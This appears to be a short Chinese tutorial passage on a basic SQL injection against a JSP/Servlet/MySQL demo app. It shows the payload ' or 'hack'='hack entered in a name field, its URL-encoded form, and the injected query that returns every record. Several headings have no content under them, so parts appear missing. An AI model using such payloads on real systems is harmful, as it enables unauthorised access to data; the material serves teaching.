一个简单的SQL注入
本例采用JSP+Servlet+Mysql:
1. 数据库:
数据库名:sqlinject
SQL注入:
结果:
这里在姓名输入框里输入了 ' or 'hack'='hack (hack名字是随意取的)
在地址栏中,%27代表单引号,+号代表一个空格,%3D代表=号,可以用JAVA的URLEncoder类和URLDecoder类进行转换
所有的记录都被查询出来了。
看下MyEclipse打印的SQL调试语句:
name is:' or 'hack'='hacksex is:mselect * from user where sex='m' and name='' or 'hack'='hack'
Over...
